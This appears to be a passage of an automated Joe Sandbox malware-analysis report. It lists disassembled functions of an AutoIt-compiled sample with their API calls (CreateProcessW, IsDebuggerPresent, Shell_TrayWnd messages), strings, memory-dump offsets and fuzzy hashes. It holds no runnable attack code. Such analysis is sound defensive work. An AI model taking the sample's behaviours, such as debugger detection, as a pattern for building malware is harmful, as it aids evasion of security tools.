                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ClassMessageNameSend_wcslen
                                  • String ID: ComboBox$ListBox
                                  • API String ID: 624084870-1403004172
                                  • Opcode ID: 1656413829e3132bd2207ffde58f151b74ffd510b7d642983c99a268f87f45f9
                                  • Instruction ID: 26674bc85890305bc41cdd0974712792849e783b8385ec34e1240504af5ea522
                                  • Opcode Fuzzy Hash: 1656413829e3132bd2207ffde58f151b74ffd510b7d642983c99a268f87f45f9
                                  • Instruction Fuzzy Hash: 9101A775781104A6CB16EB90C962EFF7BAC9B51344F54001AA9066B6D2EA249F0CC6B1
                                  Function 0036A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0036A529
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Init_thread_footer_wcslen
                                  • String ID: ,%B$3y:
                                  • API String ID: 2551934079-3517934487
                                  • Opcode ID: 41149743d077f0fb2b4a9fa4eb0da66fad92a32cba93e4aff408997c01462a9d
                                  • Instruction ID: e9ee5788dfb27ffe9aed384b30e2a6d79fa69ccc82d19c9115033ac02a198010
                                  • Opcode Fuzzy Hash: 41149743d077f0fb2b4a9fa4eb0da66fad92a32cba93e4aff408997c01462a9d
                                  • Instruction Fuzzy Hash: A2012421700A10E7C517F368AC17AAD33548B06710F90C0A5F6062B2C7EE545D468A9A
                                  Function 003E8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00423018,0042305C), ref: 003E81BF
                                  • CloseHandle.KERNEL32 ref: 003E81D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseCreateHandleProcess
                                  • String ID: \0B
                                  • API String ID: 3712363035-3715307657
                                  • Opcode ID: efcc0a29df1464e82333ec089f8e02c36e672754229dfa891478e3fcb76372e4
                                  • Instruction ID: 1ab0d8935e1412a808bf3dc0bc5d577217cda2fea6d9319e9230a576ac1bf941
                                  • Opcode Fuzzy Hash: efcc0a29df1464e82333ec089f8e02c36e672754229dfa891478e3fcb76372e4
                                  • Instruction Fuzzy Hash: 09F03AB5740314BAE2316F61AC45FB73A6CEB05752F404421BB08DA1A2D66D8E0182BC
                                  Function 003D747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen
                                  • String ID: 3, 3, 16, 1
                                  • API String ID: 176396367-3042988571
                                  • Opcode ID: 9817dff76d4872264f974d46dfc50673a46d18089a4b74bd4cfc901872ae45d2
                                  • Instruction ID: eb8e497908e3f4c8ead5589f4755a99f59403b4a3d1c75915e49b35dc3610474
                                  • Opcode Fuzzy Hash: 9817dff76d4872264f974d46dfc50673a46d18089a4b74bd4cfc901872ae45d2
                                  • Instruction Fuzzy Hash: 6EE02B13204220119233127BBCC5A7F5699CFC6790710182BFA89C6366FB989D9193A1
                                  Function 003B0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003B0B23
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Message
                                  • String ID: AutoIt$Error allocating memory.
                                  • API String ID: 2030045667-4017498283
                                  • Opcode ID: d412d5993225553587833c8b3df0cefdb9a2a52fdae7887eabf2b70fb1be88d1
                                  • Instruction ID: 801920c17a46c4c27ca8154eefffdfc8e22dd75dbf53b97a63c3cb858230daaa
                                  • Opcode Fuzzy Hash: d412d5993225553587833c8b3df0cefdb9a2a52fdae7887eabf2b70fb1be88d1
                                  • Instruction Fuzzy Hash: 4BE0D8312943582AD22636957C43FCD7E888F05B25F204427FB589D4C38BE2789146A9
                                  Function 00370D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0036F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00370D71,?,?,?,0035100A), ref: 0036F7CE
                                  • IsDebuggerPresent.KERNEL32(?,?,?,0035100A), ref: 00370D75
                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0035100A), ref: 00370D84
                                  Strings
                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00370D7F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                  • API String ID: 55579361-631824599
                                  • Opcode ID: 934479f388f1a0ed5d128da8228a74ed6cf9abf1eb1123d1de69a2eee2aa8b47
                                  • Instruction ID: df44e1bac038273e2ade142dff3886f960419bb91345239591da5a28a2652b0e
                                  • Opcode Fuzzy Hash: 934479f388f1a0ed5d128da8228a74ed6cf9abf1eb1123d1de69a2eee2aa8b47
                                  • Instruction Fuzzy Hash: 1CE06D742003918FD7369FB9E4447567BE4AB10744F008A2DE886CA6A5DBB5F4458B91
                                  Function 0036E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 0036E3D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Init_thread_footer
                                  • String ID: 0%B$8%B
                                  • API String ID: 1385522511-894736794
                                  • Opcode ID: bd679bfa0834f3ecf959cecaf80ab8e4590097e5702d36c391b21bd269cf0cbe
                                  • Instruction ID: eda022b857f12fddc5def3db64f1d4c1fc4ab59fe146fbadd3b9cad7a72ac2b5
                                  • Opcode Fuzzy Hash: bd679bfa0834f3ecf959cecaf80ab8e4590097e5702d36c391b21bd269cf0cbe
                                  • Instruction Fuzzy Hash: 13E0203DA00920FBC626971CF654949B355AF043207E0C175E0014F2D59BB828C6854C
                                  Function 003AD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: %.3d$X64
                                  • API String ID: 481472006-1077770165
                                  • Opcode ID: 9d38ac6b79da5c2256cabcaf7bdf38baeb2c4df3f53e4fc97016699b663a0c8e
                                  • Instruction ID: a2590a8749f49d7206f117dae2dc4eb855d16e922ab48d94ba3884a9cfef77ee
                                  • Opcode Fuzzy Hash: 9d38ac6b79da5c2256cabcaf7bdf38baeb2c4df3f53e4fc97016699b663a0c8e
                                  • Instruction Fuzzy Hash: FED012B1C08109E9CF5296D0DC45AF9B37CFB1A301F608852FD0792C41D624C548E761
                                  Function 003E2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E232C
                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E233F
                                    • Part of subcall function 003BE97B: Sleep.KERNEL32 ref: 003BE9F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FindMessagePostSleepWindow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 529655941-2988720461
                                  • Opcode ID: 8c769dbea206a4bbca32ea7fc31455e2fae054ff0bf5b1e6f5dd6ffaddce93a8
                                  • Instruction ID: 4bf0ef12b0cf57a7d4d377d9f13331deb5f8029a21f831840005f67d5e67eb38
                                  • Opcode Fuzzy Hash: 8c769dbea206a4bbca32ea7fc31455e2fae054ff0bf5b1e6f5dd6ffaddce93a8
                                  • Instruction Fuzzy Hash: 4DD022363A0340BBE274B330DC4FFCBBA089B00B00F000A127305AE1D0CAF4B802CA08
                                  Function 003E2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E236C
                                  • PostMessageW.USER32(00000000), ref: 003E2373
                                    • Part of subcall function 003BE97B: Sleep.KERNEL32 ref: 003BE9F3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FindMessagePostSleepWindow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 529655941-2988720461
                                  • Opcode ID: cef1ccd31a8c3f9a9cc42aad24b4d08686d549580fd785ef6f7561ad7b7a3088
                                  • Instruction ID: 4e1f6c0113cd015834d0b14867e0ed59e9acf6a274e2bceaf5a2edb754a44273
                                  • Opcode Fuzzy Hash: cef1ccd31a8c3f9a9cc42aad24b4d08686d549580fd785ef6f7561ad7b7a3088
                                  • Instruction Fuzzy Hash: BDD0A932391340BAE275A3309C4FFCAB6089B00B00F000A127301AE1D0CAA4B8028A08